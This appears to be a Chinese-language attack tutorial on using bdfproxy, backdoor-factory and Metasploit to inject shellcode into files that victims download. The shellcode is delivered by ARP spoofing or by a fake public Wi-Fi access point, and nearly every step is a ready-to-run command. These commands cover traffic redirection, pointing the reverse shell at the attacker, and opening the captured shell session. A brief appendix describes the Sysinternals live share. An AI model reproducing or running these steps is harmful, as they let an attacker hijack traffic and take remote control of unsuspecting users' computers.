前言
Bdfproxy
- 集成mitmproxy
- 基於流量劫持(中間人攻擊)動態注入 shellcode (ARP spoof、DNS spoof、Fake AP)
- 啓動路由功能進行流量劫持
- 代理端口是8080,故把所有流量都轉到8080端口
- 啓動bdfproxy,使得shell反彈
1、基於ARP欺騙
#安裝
apt install bdfproxy
apt install backdoor-factory
apt install mitmproxy
#修改 IP 轉發
sysctl -w net.ipv4.ip_forward=1
#修改 iptables
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
#修改配置文件
vi /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent #改爲透明代理
HOST = 192.168.1.113 #修改反彈shell的地址(攻擊者kali地址)108行,117行,128行,156行,179行,188行,替換所有的,有6個
#啓動
bdfproxy
#啓動 msfconsole
msfdb init #初始化
msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
msf exploit(multi/handler) > jobs
# arp 欺騙
arpspoof -i eth0 -t 192.168.1.114 192.168.1.113 #前面的IP是靶機winxp
#靶機瀏覽器瀏覽和下載都能在kali的日誌裏看到
#靶機嘗試下載執行軟件並打開
#kali裏有了反彈shell
msf exploit(multi/handler) > sessions -i 1 #進入shell
2、無線流量劫持
- mana 創建 Fack AP
- badfproxy 代理注入代碼
- msf 偵聽反彈 shell
#安裝
apt install kali-linux-all
apt install mana-toolkit
#修改無線 SSID 名稱
vi /etc/mana-toolkit/hostapd-mana.conf
ssid=KFC-freenet #改的像wifi
#修改無線網卡適配器並啓動
cd /usr/share/mana-toolkit/run-mana/ #這裏有很多腳本
cp start-nat-simple.sh mana.sh #選擇start-nat-simple.sh並不破壞他
vi mana.sh
phy=wlan0 #修改爲插入的無線網卡名
iptables -F #清空
iptables -t nat -F
iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -i $phy -p tcp --dport 443 -j REDIRECT --to-ports 8080
#別的iptables都刪掉
./mana.sh
#插入無線網卡
#修改 IP 轉發
sysctl -w net.ipv4.ip_forward=1
#修改偵聽 IP 地址並啓動 bdfproxy
vi /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent
bdfproxy
#啓動 msf
msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
3、補充
https://live.sysinternals.com/
- 這是允許訪問所有Sysinternals公用程序的文件共享。我們已經開發了這個功能來測試我們實用程序的替代分配機制。
- 這將允許您從任何連接到互聯網的計算機運行這些工具,而無需導航到網頁,下載並解壓zip文件。
https://docs.microsoft.com/zh-cn/sysinternals/
- Sysinternals網站由Mark Russinovich於1996年創建,主辦他先進的系統實用程序和技術信息。無論您是IT專業人員還是開發人員,您都可以找到Sysinternals實用程序來幫助您管理,診斷和診斷Windows系統和應用程序。
結語
至此免殺學習告一段落